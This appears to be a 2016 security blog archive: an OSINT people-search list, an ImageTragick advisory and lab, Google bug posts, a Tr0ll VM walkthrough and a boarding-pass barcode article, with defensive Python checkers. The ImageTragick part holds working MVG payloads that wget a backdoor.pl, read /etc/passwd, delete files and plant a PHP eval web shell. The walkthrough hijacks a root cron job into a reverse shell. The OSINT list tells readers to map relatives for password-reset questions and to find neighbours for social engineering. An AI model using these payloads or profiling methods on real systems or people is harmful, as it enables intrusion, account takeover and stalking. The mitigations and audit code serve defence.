Friday, 1 July 2016

Footprinting unique guide

Source and credits: irongeek and lynde

General Search:

Google
Duh. Make sure you know your operators to get the most out of it, however.
http://www.google.com

Bing
Ok, Bing gets made fun of a lot as an “also ran” next to Google, but it has a few awesome features. Many of the same operators from Google work here, but one I really dig that only Bing has is IP: to find other websites on the same IP (shared host cross referencing fun).
http://www.bing.com/

Networking, Domain and Routing Information


Most of this page will cover finding out information on people from social networks, not network networks. However, sometimes knowing who owns a network/domain/IP is a great place so start, and people leave things in their Whois records that may reveal a lot of useful leads. There are so many sites that offer these types of services, but I’ll only cover my favorites.

RobTex
While the interface is a bit weird in my opinion, this is a great site for doing reverse DNS look-ups on IPs, grabbing Whois contacts, and finding other general information about an IP or domain name.
http://www.robtex.com

ServerSniff
This one is sort of an oddball. Lots of sites offer Whois info; this one goes for more exotic tools. You really have to just play with it to find all of its features, and it's sometimes hard to remember which option is where. Just some of the tools are: ICMP and TCP traceroutes, SSL info, DNS reports and hostnames on a shared IP. It's nice to have them do some of the recon for you if you don't want to use a proxy and don't wish for your IP to show up in the target's logs.
http://serversniff.net

Looking for profiles on a person

OSINT BOOKMARKLETS v0.2
http://illmob.org/bookmark.html
Cool page from Will Genovese where you can look up Phone, IP, Host, Email, S/N, Name, and Address info in an automated fashion.

Moose Roots
http://www.mooseroots.com
Awesome site, especially for these sub-sites
http://birth-records.mooseroots.com/
http://marriage-divorce-records.mooseroots.com/
which are great for mapping out family relations for password reset questions.

Advanced Background Checks
For finding street addresses and relatives this is the bomb. So far, it has not failed me on finding street addresses if I have a vague idea where someone lives.
http://www.advancedbackgroundchecks.com
Peek You
The interface is clean, and while it links off to pay sites it at least gives you real information first. I seem to recall it being better in the past.
http://www.peekyou.com

Lullar
Search for a person using Email|Name|user name. There are not as many results returned as on other sites, but what it gives you is nice and clean, without all of the paid sites in the way.
http://com.lullar.com/

Check Usernames
Ok, got to say I love this site. It may not have been meant as a site for profiling, but it works well for that task. We all talk about password reuse being a problem, but for profiling someone, user name reuse is where it is at. This site lets you search 160 social network sites to see if a screen name is taken. From there, you can go see what is in a person's profile on those sites by hand. Saves some time versus checking for an account on each site yourself, but there is still lots of work for you to do afterwards.
http://www.checkusernames.com/

KnowEm
Similar to Check Usernames above, but claims to check over 500 sites to see if a given user name is taken.
http://knowem.com

iSearch
This used to be Spock ("Single Point Of Contact (by) Keyword"). Not sure when it changed; my guess is after Intelius bought them. You can search on Name|Phone|Email|Screen Name. Good for finding relatives I suppose. Once you find a name from a user name you should step back and search for it as well, as the results vary a lot. Seems to mostly drive people to paying money to Intelius.
http://www.isearch.com

Pipl
You can search for Name|Email|user name|Phone and find related results. The results can be very noisy, with links to a bunch of paid sites (Spokeo, Intelius, etc.), but if you are willing to sort through the crap it's pretty nice. I like what it shows from public records, Amazon profiles, and social networks.
http://www.pipl.com

123 People
Much like all of the above. Links off to a bunch of other resources, some paid and some not.
http://www.123people.com

Spokeo
Ok, Spokeo has some nice layout features but it’s an info tease. It reports “hey I found something” a lot, but you have to pay for the results. Much like crime, I don’t pay. Still, it can be nice as a starting point to lead you elsewhere. For example, once you know someone has a Facebook profile, you can just go to Facebook.
http://www.spokeo.com

WebMii
Lets you look up people by name or keyword (try a user name as a keyword).
http://webmii.com/

Zoom Info
Seems pretty good for finding where someone works. I wonder how much of the information is just from LinkedIn, and how much from other sources? Looking at them side by side, Zoom Info does seem to augment the details with other sources.
http://www.zoominfo.com

Geo Location

Android Map
If you have the MAC address of a router (it happens), Samy has a tool to try to geolocate it based on what Google knows. Seems likely that Google is using Android phones to do a distributed wardrive to supplement their Street View car data.
http://samy.pl/androidmap

Bing Map Apps
The map apps are a nice extra to have, but you will need SilverLight and they don’t seem stable unless you are using Internet Explorer (go figure). Look at the Twitter map app.
http://www.bing.com/maps/

Twitter Map
Also nice to see where people are tweeting from, but not as slick or as comprehensive as the Bing app.
http://twittermap.appspot.com/


Other Oddities

411
I've had good luck with using this to find addresses and neighbors.
http://www.411.com/
Google Images
I imagine most folks know about Google Images, but did you know you can upload images (or drag and drop them) to find similar results? Good for finding profiles under different names. Tin Eye is similar, but does not seem to cover as much.
http://images.google.com/
Tin Eye
Ever found a picture of someone, and wondered if it existed elsewhere? Tin Eye, and its browser plugin, let you choose a picture and find similar ones online, even ones that have been seriously shopped. Unfortunately, the database seems small. My hope would be to go to a social network profile, right click on an image where I only know the user name, then find other profiles with a real name and better information. So far, it's mostly been useful for finding out "who is this actor/model", but perhaps in the future it will be better.
http://tineye.com

Open Book
Got to love people that leave Facebook comments open to the world. Even if one person is privacy aware, a friend of theirs may not be and could make comments about them.
http://youropenbook.org/

Open Status Search
Open Book seems to be gone, and Open Status Search seems to be the next best thing.
http://openstatussearch.com/

Pic Fog
May find something good, may find something that scars you for life.
http://picfog.com

White Pages Find Neighbors
Might be useful if you need to SE someone close by.
http://www.whitepages.com/find_neighbors
Yasni
I've had some pretty good luck using this to scrape info on people.
http://www.yasni.com

Archive.org Wayback Machine
Sometimes someone drops their docs, but removes them. The Wayback Machine may help you find the deleted info.

http://www.archive.org/web/web.php

Board Reader
Maybe the person posts on some forums with a given user name? Could lead to useful info.
http://boardreader.com

OMGili
Another board search, like the above.
http://omgili.com

Tools

Ok, these are not websites, but damn useful tools that pull from web resources.

Maltego
Nifty tool, and I like the way it draws connections between entities like name, domain, email addresses, etc., good for building a mind map of how things are related. I still prefer to do things by hand to clear up false positives and interpret data. You will likely have to register for API keys to get the most use out of it.
http://www.paterva.com

NetGlub
This could someday be an open source replacement for Maltego, but right now it seems next to impossible to get working.
http://www.netglub.org/

Foca
I really dig this tool. It can do searches for common document formats using Google and other search engines, then download them to extract metadata. Lovely.
http://www.informatica64.com/DownloadFOCA/

Cree.py
Great tool for geolocating/tracking Twitter/Foursquare users. Not only pulls coordinates from the posts directly, but can grab them from the EXIF data in pictures they link to.
http://ilektrojohn.github.com/creepy/


Sites I’ve found so useless...
... that I won’t even link to them, but I want to keep people from asking “why isn’t X listed?” Mostly you get on this list for having little to no free information, and only leading to questionable for pay information.

zabasearch
yoname (used to like it, now the results seem pretty bad)
wink
mylife
freeality
infospace

Tuesday, 17 May 2016

Image Magick Exploit Tutorial

Hi friends,

It's been a long time since I blogged, so I came up with a topic: the ImageMagick exploit.

Here is the information which i decided to blog about :

What is ImageMagick?


ImageMagick is popular software used to convert, edit and manipulate images. It has libraries for all common programming languages, including PHP, Python, Ruby and many others. It is also very simple to use, which led to it being used by many developers in need of image cropping or manipulation.
However, the latest versions of ImageMagick don't properly filter the file names that get passed to the internal delegates that handle external protocols (like HTTPS). This allows an attacker to execute their own commands remotely by uploading an image. This leads to a full RCE (remote command execution) vulnerability in your image uploader. The vulnerability is so serious that researchers created a fun nickname for it which is easier to remember than just CVE-2016-3714: ImageTragick.

Vulnerability Details

Since the initial partial disclosure of this vulnerability our research team has been 100% focused on trying to create a workable proof of concept to understand the exploit and test our own protections against it. After many hours and some great help from the security community, we were able to understand the vulnerability enough to create a simple PHP upload tool that uses ImageMagick, and the exploit to compromise it (hat tip to Cosmin, one of our developers who helped the research team there).
The vulnerability is very simple to exploit: an attacker only needs an image uploader tool that leverages ImageMagick. During our research we found many popular web applications and SaaS products vulnerable to it (people love gravatars), and we have been contacting them privately to get things patched. Unfortunately, even with all the media attention, not everyone is aware of this issue.
Going into a bit more detail, this vulnerability can actually be divided into 4 different issues (or maybe 5, depending on who you ask), which is very well explained by Karim Valiev from the Mail.Ru Security Team here. To summarize, this is what we have to be aware of:
  1. Remote command execution on .mvg/.svg file uploads. By providing a malicious file, an attacker can force a shell command to be executed on the server. This is a very simple example being shared lately:
    image Over 0,0 1,1 'url(https:";wget "http://pastebin.com/raw/badpastebin" -O /home/vhosts/file/backdoor.pl")'
    When that gets added to a MVG file, the wget command is executed and the output of the pastebin file saved on backdoor.pl.
  2. Remote file deletion. When using the “ephemeral:/” protocol, an attacker can remove files on the server
  3. Remote file moving: Similar to the file deletion issue, but when using the “msl:/” pseudo protocol, the attacker can move files around
  4. File content disclosure when using the “label:@” protocol.
When combining all these issues, attackers have a wide range of options and tools to compromise a web application that leverages ImageMagick. Note that filtering only for the MVG extension is not enough, as any file format will be inspected and the command executed.
I suspect a lot more vulnerabilities within ImageMagick will be found soon as more researchers are looking at it.
Also note that the latest signature sets for ModSecurity and other IDS tools do not detect or block this issue. We updated our WAF last night to virtually patch this vulnerability; users behind the Sucuri Firewall are now protected. We also went back looking for previous attacks and we didn't see any in the wild, yet. That will likely change soon as attackers build their own exploits.

Protection

Users behind our WAF are already protected against this vulnerability, but we still recommend that everyone follow the ImageMagick developers' recommendation: edit the /etc/ImageMagick/policy.xml file and disable the processing of MVG, HTTPS, URL, EPHEMERAL, and MSL commands within image files. In the policymap section, add the following lines:
<policymap>
...
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="HTTPS" />
  <policy domain="coder" rights="none" pattern="URL" />
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="MSL" />
</policymap>
If you cannot make those changes, I recommend disabling the image upload functionality for now until you can properly patch. Better safe than sorry.
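To confirm that the mitigation is actually in place, here is an added checker (it is not from the advisory or from ImageMagick itself) that parses a policy.xml and reports which of the five coders named above are still not denied. The two policy documents inside it are constructed samples: one resembling a stock file that only limits resources, one with the lines above added.

```python
import xml.etree.ElementTree as ET

# Coders the advisory above says to deny outright (rights="none").
REQUIRED_DENIED = ("EPHEMERAL", "HTTPS", "URL", "MVG", "MSL")


def denied_coders(policy_xml):
    """Return the set of coder patterns to which this policy grants no rights at all."""
    root = ET.fromstring(policy_xml)
    denied = set()
    for pol in root.iter("policy"):
        if pol.get("domain") == "coder" and pol.get("rights") == "none":
            denied.add(pol.get("pattern", "").upper())
    return denied


def missing_mitigations(policy_xml):
    """List the coders from the advisory that the policy still leaves enabled (in advisory order)."""
    have = denied_coders(policy_xml)
    return [coder for coder in REQUIRED_DENIED if coder not in have]


def check_policy_file(path):
    """Same check against a policy.xml on disk, e.g. /etc/ImageMagick-6/policy.xml on Kali."""
    with open(path, encoding="utf-8") as fh:
        return missing_mitigations(fh.read())


# Constructed sample: a stock-looking policy that only limits resources,
# i.e. the state of the file before the edit the advisory asks for.
WEAK_POLICY = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE policymap [
<!ELEMENT policymap (policy)+>
<!ELEMENT policy EMPTY>
]>
<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
  <policy domain="resource" name="disk" value="1GiB"/>
</policymap>
"""

# Constructed sample: the same file with the five lines from the advisory added.
HARDENED_POLICY = WEAK_POLICY.replace(
    "</policymap>",
    """  <!-- ImageTragick mitigation -->
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="HTTPS" />
  <policy domain="coder" rights="none" pattern="URL" />
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="MSL" />
</policymap>""",
)

if __name__ == "__main__":
    for label, doc in (("stock", WEAK_POLICY), ("hardened", HARDENED_POLICY)):
        gaps = missing_mitigations(doc)
        print(f"{label}: {'OK' if not gaps else 'still enabled: ' + ', '.join(gaps)}")
```

`convert -list policy` prints the policy ImageMagick actually loaded, which tells you which policy.xml path is in effect before you point the checker at it.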



Now, how to exploit it:

Purpose

This is a very simple exploit that was made public on May 4, 2016. It's a code injection vulnerability, caused by software that takes user input and uses it to construct a command line.

What You Need

  • A Kali 2 machine, real or virtual

Task 1: Proof of Concept (5 pts.)

Checking ImageMagick Version

This bug has been patched, so if you have recently updated, your version may not be vulnerable. To check your version, in a Kali Terminal window, execute this command:
convert -version
When I did it, my version was "ImageMagick 6.8.9-9", as shown below. This version is vulnerable. If you see a different version number, check the Sources at the bottom of this project to see if it's vulnerable.

Creating the Exploit File

In a Kali Terminal window, execute this command:
nano exploit.mvg
In nano, enter the code shown below. Notice the mismatched single-quotes and double-quotes and the https URL that won't resolve. The vulnerability is in the https processor, and the payload of this exploit is the "ls -la" at the end.

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com"|ls "-la)'
pop graphic-context

Press Ctrl+X, Y, Enter to save the file. In a Kali Terminal window, execute this code:
convert exploit.mvg out.png
The "ls -la" command executes, listing the files in your working directory, as shown below.

Saving the Screen Image

Make sure you can see these two required items, as shown in the image above:
  • A convert command followed by a filename ending in .mvg
  • A file listing showing the same filename ending in .mvg with a Date
Save a whole-desktop image, using a filename of "Proj X19a from YOUR NAME".

Task 2: Mitigation (5 pts.)

This mitigation prevents the exploits by disabling the vulnerable ImageMagick coders. In a Kali Terminal window, execute this command:
nano /etc/ImageMagick-6/policy.xml
Scroll down to find the policymap section, as shown below.
Place your cursor under the <policymap> line and press the Enter key a few times to make some room, as shown below.

Insert the lines shown below in the blank region you just created.

  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="URL" />
  <policy domain="coder" rights="none" pattern="HTTPS" />
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="MSL" />

Press Ctrl+X, Y, Enter to save the file. In a Kali Terminal window, execute this code:
convert exploit.mvg out.png
The "ls -la" command does not execute. Instead, you see a "convert: not authorized" message, as shown below.

Saving the Screen Image

Make sure you can see the "convert: not authorized" message, as shown in the image above. Save a whole-desktop image, using a filename of "Proj X19b from YOUR NAME".

Task 3: Listening Shell (10 pts.)

First, undo the Mitigation above, so your ImageMagick is vulnerable again. Then create a malicious file named shell.mvg that opens a listening backdoor shell. You may find this document helpful

Some additional ImageMagick exploits:


ImageMagick is vulnerable to a variety of attacks that allow reading, deleting,
and writing files.

Here are some useful tricks to complement the fill 'url()' vulnerability
described by @CrazedSec.

@air


== 1 ==

It's possible to read arbitrary files from a web server by uploading an
ImageMagick Vector Graphics file (MVG) that the web application processes with
ImageMagick:

push graphic-context
    viewbox 0 0 1024 1024
    image over 0,0 0,0 'label:@/etc/passwd'
pop graphic-context

As is the case with all of these vulnerabilities, the file doesn't need to be
uploaded with a .mvg extension.  You can change it to .png, .jpg, or anything
else.

If the file doesn't exist, you'll see the @ symbol plus the filename as the
output.


== 2 ==

You can use a similar technique to delete a file, provided ImageMagick is built
with support for its ephemeral protocol:

push graphic-context
    viewbox 0 0 1024 1024
    image over 0,0 0,0 'ephemeral:/var/www/index.php'
pop graphic-context


== 3 ==

You can move files around, provided you're able to determine the location of
uploaded files.  This can be used to upload new files as well as overwrite
existing files.

first_image.png:

<?xml version="1.0" encoding="UTF-8"?>
<image>
    <read filename="/var/www/uploads/second_image.png"/>
    <write filename="/var/www/hi.php"/>
</image>


second_image.png:

push graphic-context
    viewbox 0 0 1024 1024
    image over 0,0 0,0 'label:<?php if($_SERVER["REQUEST_METHOD"]=="POST")eval(file_get_contents("php://input")); ?>'
pop graphic-context


third_image.png:

push graphic-context
    viewbox 0 0 1024 1024
    image over 0,0 0,0 'msl:/var/www/uploads/first_image.png'
pop graphic-context

Hope it's useful

Monday, 21 March 2016

GOOGLE BUG : Anyone can be added into google hall of fame

Hi

I recently discovered one interesting bug at Google: anyone can be added to the Google Hall of Fame.

Don't you believe it? Yes, it's real.


Bug reproducing steps :

1) Sign in to Gmail
2) Go to https://bughunter.withgoogle.com/
3) Create a profile

4) Note: as per Google's link, only valid bugs will qualify, and you would be listed in the Hall of Fame based upon the bugs which you created

5) Now, after creating the profile, click on Hall of Fame


within minutes of time you would be listed at "Google Hall of Fame"



Bug Timeline:

Feb 29, 2016: Bug sent to Google

Mar 1, 2016: Forwarded to internal team

Mar 10, 2016: Google team denied it, saying it's not a bug

Mar 10, 2016: Requested public disclosure

Mar 10, 2016: Disclosed publicly

Monday, 29 February 2016

Information disclosure & Source code disclosure by Google

Yep, you read it right.

On Friday, Google's bug bounty page collapsed and revealed the location of Google's source code.

While I was trying to create a Google vulnerability researcher profile, I thought to check for validations; while I was checking some basic-level validations, the page crashed and revealed its source code.

The above image was the proof of the information that was disclosed. Google immediately patched this issue.


Vulnerability Timeline:

Bug found on google : Friday Feb 26,2016
Bug Patched by google : Friday Feb 27,2016
Requested for disclosure

Closure of bug and the bug filed as duplicate : Feb 29,2016

Although I found the bug, it's sad that someone filed it before me. The real credit goes to the reporters who reported the bug first.

Saturday, 28 November 2015

Troll Pentest Lab walkthrough

Code name: tr0ll
Webpage: http://overflowsecurity.com/?p=70
VM download: http://download.vulnhub.com/tr0ll/Tr0ll.rar
Challenge: hack your way into the system and get root
First of all and just after booting our victim’s box, we start by searching tr0ll on the network.
# netdiscover
As our victim VM is running under VirtualBox, we can find its IP easily: we just have to look at the MAC vendor, which will be CADMUS COMPUTER SYSTEMS.
Now we got our victim’s IP we will use nmap to scan for open ports and interesting information
# nmap -Pn -A -p- 192.168.11.8
Nice, ports 21, 22 and 80 open. And according to the output of nmap, there's an ftp server running on port 21 with anonymous login enabled!
# ftp 192.168.11.8
We successfully logged into the ftp server, and after checking our permissions, the only thing we can do here is download the lol.pcap file.
# get lol.pcap
lol.pcap looks like a Wireshark capture file. Let's use Wireshark to see what's inside.
The capture file seems to be a "conversation" between an ftp client and an ftp server. But if we look at it closely we can see an interesting file out there, secret_stuff.txt. As we just saw, that file doesn't seem to be inside the ftp server right now. We can use Wireshark to read its content:
“we almost found the sup3rs3cr3tdirlol”
Well, let’s keep that and go scan our next service. Next step will be looking inside the web server. We start by just browsing it
Nothing more than the expected, no sensitive information found. We will use nikto to look for hidden directories
# nikto -h http://192.168.11.8
After running the scan we found the "/secret/" dir. And if we browse it..
Nothing new… just more trolling. N0w's when the thinkin' begins. After a few minutes I remembered the sup3rs3cr3tdirlol… and when I looked at that dir in the browser
Nice, that’s actually a directory on the web server. That directory contains a file, we will download it.
After a few tries, we realized that the file is an executable. If we run that executable we can get a memory address. Following the same logic we used with the sup3rs3cr3tdirlol, let’s put it in the browser one more time.
Nice, now let's look inside those directories.
The first seems to contain a list of users and the second a password. We can try to perform a dictionary-based attack against the ftp and ssh services on our target machine.
After a few minutes of banging my head against the wall, I realized that the ssh username was "overflow" and its password was "Pass.txt" (trolled again). So we can log into the system with these credentials.
Nice, we are in. Now we can look for suid files or weaknesses in the kernel.
But after about 2 minutes inside…
Uh.. something or someone killed our connection. What could it be? After a quick analysis we can see that it happens every 2 minutes. Every 2 minutes? Can it be a cron task?? Let's see.
We can't actually see or edit crontab, but we can read /var/log/cronlog and that will give some interesting info.
Nice, cron is running a python script called cleaner every 2 minutes. We can use the find command to search for that file:
# find / -name 'cleaner.py' 2>/dev/null
Now let's read the file.
What that file does is delete all the content in /tmp every time it's called.
But that's executed by the user root! Thinking the same? That could be a great way of doing our privilege escalation!
For the next trick we will need to start our netcat listener on port 9988.
Then, after editing our "perl-reverse-shell.pl", we download it into the /tmp dir on the target machine.
And finally, we edit cleaner.py like this:
Now every 2 minutes, our victim will send a root shell to 9988 on our box B-). We can go to the fridge, grab a beer and wait for a shell.
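The privilege escalation above works only because root's cron job runs a script that a low-privileged user can edit. Here is an added defender-side check (not part of the walkthrough) for the scripts referenced from crontabs: it inspects ownership, the script's own mode bits and the parent directory's, and flags what makes a script hijackable. The demo builds a constructed temporary directory holding a world-writable cleaner.py beside a correctly permissioned sibling; the file contents are placeholders and are never executed.

```python
import os
import stat
import tempfile

OTHERS_WRITE = stat.S_IWGRP | stat.S_IWOTH


def writable_by_others(path):
    """True when the group or world write bit is set. Mode bits are checked rather than
    os.access() so the verdict is the same whoever runs the audit (root included)."""
    return bool(os.stat(path).st_mode & OTHERS_WRITE)


def audit_cron_script(path):
    """Reasons a script executed by root from cron could be tampered with by a non-root user."""
    reasons = []
    st = os.stat(path)
    if st.st_uid != 0:
        reasons.append("not owned by root")
    if writable_by_others(path):
        reasons.append("group/other-writable")
    parent = os.path.dirname(os.path.abspath(path))
    pmode = os.stat(parent).st_mode
    # A writable parent lets an attacker rename/replace the script even if the
    # file itself is read-only; the sticky bit (as on /tmp) blocks that for other users' files.
    if (pmode & OTHERS_WRITE) and not (pmode & stat.S_ISVTX):
        reasons.append("parent directory writable, script can be replaced")
    return reasons


def audit_many(paths):
    """Map each existing script path to its list of findings (empty list means clean)."""
    return {p: audit_cron_script(p) for p in paths if os.path.isfile(p)}


def demo():
    """Constructed scenario: cleaner.py left 0777 (as in the lab) next to a 0755 sibling.
    Returns {basename: reasons}; the temporary directory is removed afterwards."""
    with tempfile.TemporaryDirectory() as d:
        os.chmod(d, 0o755)
        bad = os.path.join(d, "cleaner.py")
        good = os.path.join(d, "safe.py")
        for p in (bad, good):
            with open(p, "w") as fh:
                fh.write("# placeholder script body, never executed by this demo\n")
        os.chmod(bad, 0o777)
        os.chmod(good, 0o755)
        return {os.path.basename(p): r for p, r in audit_many([bad, good]).items()}


if __name__ == "__main__":
    for name, findings in demo().items():
        print(f"{name}: {', '.join(findings) if findings else 'no issues'}")
```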

Wednesday, 7 October 2015

Don’t throw away your old Boarding Pass, it may contain personal information

Do you have a habit of throwing away your boarding pass? Read this.

After finishing your trip, the boarding pass becomes useless, but does that mean that you should throw it in the garbage? Certainly not.
Have you ever thought about what information is contained inside a barcode? No ?
The popular investigator Brian Krebs has published an interesting post on the topic explaining that a Boarding Pass Barcode contains a lot of data.
Airlines use the boarding pass barcode for every single boarding pass, but what happens if someone tries to read the information it contains?
Krebs reported the attempt made by one of his readers, named Cory, who saw a friend posting his boarding pass on Facebook and decided to analyze it.
“I found a website that could decode the data and instantly had lots of info about his trip,” said Cory, “Besides his name, frequent flyer number and other [personally identifiable information], I was able to get his record locator (a.k.a. “record key” for the Lufthansa flight he was taking that day,” “I then proceeded to Lufthansa’s website and using his last name (which was encoded in the barcode) and the record locator was able to get access to his entire account. Not only could I see this one flight, but I could see ANY future flights that were booked to his frequent flyer number from the Star Alliance.”
It's frightening what someone could do with this information. I used the barcode reader website myself to read an old boarding pass barcode, and the information I could get.
Boarding pass barcodes have been widely available for years; the International Air Transport Association (IATA) published a detailed document on how the barcode standards have been implemented by the organizations in the industry.
Coming back to Cory's story, he was able to use the info available in the barcode to enter the Lufthansa website and access his friend's phone number, the name of the person who did the booking, and see future flights connected to the frequent flyer account.
What do you think about the possibility of conducting a targeted attack with this data? For example, an attacker can send a spear phishing email to the victim reporting information on his flights.
The situation gets worse if we consider that, with access to the list of future flights, an attacker is able to cancel them or change seats.
An attacker could also reset the PIN number associated with the Star Alliance frequent flyer account. In Cory's case, he tried the "Forgot Pin" reset and his friend's question was, "What is your Mother's maiden name?" Information like this is not that difficult to extract and can probably be found on social media.
This is just an example of what can be done with a barcode, and of the amount of information that can be extracted. Often people consider the information revealed harmless, but that's because they don't think like a criminal.
“Interested in learning what’s in your boarding pass barcode? Take a picture of the barcode with your phone, and upload it to this site. This blog on the same topic from several years back includes some helpful hints on how to decode the various information fields that get dumped by the barcode reader,” states Brian Krebs.
My advice to our dear readers is:
  • Do not leave your old boarding pass in the airplane
  • Avoid putting the boarding pass in the garbage in one piece
  • Don’t publish the boarding pass in social media

What’s contained in a boarding pass barcode?

Anyone who has flown within the past few years would have seen the now ubiquitous barcode on the boarding pass that’s scanned upon boarding the aircraft.
Over the years I have seen many people post images of these boarding passes online, often while reviewing new technologies such as mobile or web check-in. In most cases any personally identifiable plain-text information has been obfuscated yet the barcode has been left intact.
Eventually curiosity got the better of me and I decided to find out more information on the barcode standard, and the information contained within them.

History of the barcode

In 2005 the IATA (International Air Transport Association) commenced a five year project to deploy Bar Coded Boarding Passes (BCBP) across its member airlines to eliminate magnetic boarding passes. This change would allow airlines to use cheaper boarding pass stock, and even enable technologies such as web and mobile check-in – an advancement estimated to save the industry US$1.5bn annually.

What information do they contain?

When writing this article I set out collecting various boarding pass barcodes, both from my own archived web check-ins and from other boarding passes found on the Internet.
Using freely available software utilities, I decoded the barcodes and had a look to see what’s there. Here’s an example from a Qantas flight of mine taken last month (decoded from the barcode on the web check-in document):
That information translates to:
  • M1: Format code ‘M’ and 1 leg on the boarding pass.
  • EWING/SHAUN MR: My name.
  • 1A11A1: My booking reference.
  • BNESYDQF: Flying from BNE (Brisbane) to SYD (Sydney) on QF (Qantas).
  • 551: Flight number 551.
  • 107: The Julian date. In this case 107 is April 17.
  • Y: Cabin – Economy in this case. Others including F (First) and J (Business).
  • 26J: My seat.
  • 37: My sequence number. In this case I was the 37th person to check-in.
  • 00: Field size of airline specific data message. 00 as there isn’t any.
In this instance, Qantas are using the minimum data fields as required by the IATA BCBP standard, but what about other boarding pass types?
The next step was to try a real boarding pass issued at the airport.
There’s more information in this boarding pass barcode, which is as follows:
  • M1: Format code ‘M’ and 1 leg on the boarding pass.
  • EWING/SHAUN: My name.
  • E1AAAAA: Electronic ticket indicator and my booking reference.
  • SYDBNEQF: Flying from SYD (Sydney) to BNE (Brisbane) on QF (Qantas).
  • 0524: Flight number 524.
  • 106: The Julian date. In this case 106 is April 16.
  • Y: Cabin – Economy in this case. Others including F (First) and J (Business).
  • 23A: My seat.
  • 0073: My sequence number. In this case I was the 73rd person to check-in.
  • 3: My “passenger status”.
  • 59: The size of the variable-size field that follows.
  • >: Beginning of the version number
  • 2: The version number.
  • 18: Field size of another variable field.
  • 0: My check-in source.
  • B: Airline designator of boarding pass issuer.
  • 2: Another variable size field.
  • 9: Airline code.
  • 0: International document verification. '0' as I presume it is not applicable.
  • QF: The airline my frequent flyer account is with.
  • 1245678: My frequent flyer number.
  • 128: Airline specific data.
After this I checked an iPhone boarding pass. This contains the same information as on an airport issued boarding pass.
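The two field lists above follow the fixed-width layout of the mandatory section of an IATA BCBP "M" format barcode. The following is an added example, not code from the article: an encoder and parser for that 60-character section, plus a redaction helper that masks only the name and booking reference so a boarding pass image can be shared without handing over the booking. The sample values are constructed from the first Qantas example (the second example's "E1AAAAA" splits the same way, into the "E" e-ticket indicator and the PNR); the year and the passenger status are assumptions, since the barcode does not encode the year and the first example does not list a status.

```python
import datetime

# Mandatory items of leg 1 of an IATA BCBP "M" format barcode, in order, with
# their widths; together they occupy the first 60 characters of the string.
MANDATORY_ITEMS = [
    ("format_code", 1), ("legs", 1), ("name", 20), ("eticket_indicator", 1),
    ("pnr", 7), ("from_city", 3), ("to_city", 3), ("carrier", 3),
    ("flight_number", 5), ("julian_date", 3), ("compartment", 1),
    ("seat", 4), ("sequence", 5), ("passenger_status", 1),
    ("conditional_size_hex", 2),
]
MANDATORY_LENGTH = sum(width for _, width in MANDATORY_ITEMS)  # 60

# Constructed sample from the first decoded Qantas example on this page.
# passenger_status is an assumed value; the page does not list it for that pass.
SAMPLE_FIELDS = {
    "format_code": "M", "legs": "1", "name": "EWING/SHAUN MR",
    "eticket_indicator": "E", "pnr": "1A11A1", "from_city": "BNE",
    "to_city": "SYD", "carrier": "QF", "flight_number": "0551",
    "julian_date": "107", "compartment": "Y", "seat": "026J",
    "sequence": "0037", "passenger_status": "1", "conditional_size_hex": "00",
}


def field_span(name):
    """(start, end) offsets of a mandatory field within the raw string."""
    pos = 0
    for item, width in MANDATORY_ITEMS:
        if item == name:
            return pos, pos + width
        pos += width
    raise KeyError(name)


def encode_bcbp(fields):
    """Lay the field values out as the space-padded 60-character mandatory section."""
    parts = []
    for name, width in MANDATORY_ITEMS:
        value = str(fields[name])
        if len(value) > width:
            raise ValueError(f"{name} exceeds {width} characters")
        parts.append(value.ljust(width))
    return "".join(parts)


def julian_to_date(day_of_year, year):
    """The barcode stores the flight date as a day-of-year number only."""
    return datetime.date(year, 1, 1) + datetime.timedelta(days=day_of_year - 1)


def parse_bcbp(raw, year):
    """Decode the mandatory section; the caller supplies the year the pass was issued in."""
    if len(raw) < MANDATORY_LENGTH or raw[0] != "M":
        raise ValueError("not an M-format BCBP string")
    f = {name: raw[slice(*field_span(name))].strip() for name, _ in MANDATORY_ITEMS}
    return {
        "legs": int(f["legs"]),
        "name": f["name"],
        "electronic_ticket": f["eticket_indicator"] == "E",
        "pnr": f["pnr"],
        "route": (f["from_city"], f["to_city"], f["carrier"]),
        "flight_number": f["flight_number"].lstrip("0") or "0",
        "flight_date": julian_to_date(int(f["julian_date"]), year),
        "compartment": f["compartment"],
        "seat": f["seat"].lstrip("0"),
        "sequence": int(f["sequence"]),
        "passenger_status": f["passenger_status"],
        # Length (hex) of the conditional/airline data that follows the 60 mandatory chars.
        "conditional_size": int(f["conditional_size_hex"], 16),
    }


def redact_for_posting(raw):
    """Mask the two fields that let a stranger manage the booking (name and PNR),
    keeping every other character in place so the layout stays intact."""
    chars = list(raw)
    for name in ("name", "pnr"):
        start, end = field_span(name)
        for i in range(start, end):
            if chars[i] != " ":
                chars[i] = "X"
    return "".join(chars)


if __name__ == "__main__":
    raw = encode_bcbp(SAMPLE_FIELDS)
    print(raw)
    for key, value in parse_bcbp(raw, year=2015).items():
        print(f"{key:>18}: {value}")
    print(redact_for_posting(raw))
```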

What could you do?

Most of the information contained within the boarding pass is fairly mundane, and the main point to this exercise is – if you’re going to post an image of your boarding pass online and obfuscate your name – also obfuscate the barcode.
The booking reference is however contained within the barcode and someone could use that to manipulate your booking (if you have more flights to go).

Who is Eddy Chiu?

Qantas have an example web boarding pass on their web site for “FYSH/WILLIAM MR” – a name frequently seen on the sample Qantas cards and other literature.
Intriguingly the barcode on this boarding pass doesn’t match up with the details, and instead shows:
While Mr Chiu is on the same flight as on the boarding pass, he is not sitting in the same seat as Mr Fysh yet shares the same sequence number.
I suspect an easter egg or “calling card” from a developer.

Source : securityaffairs,shaun.net

 

Tuesday, 6 October 2015

Headphone checklist : Tech 101

Source : Tech101 ndtv gadgets

Buying headphones can be daunting. Here are some of the commonly used terms you should know.
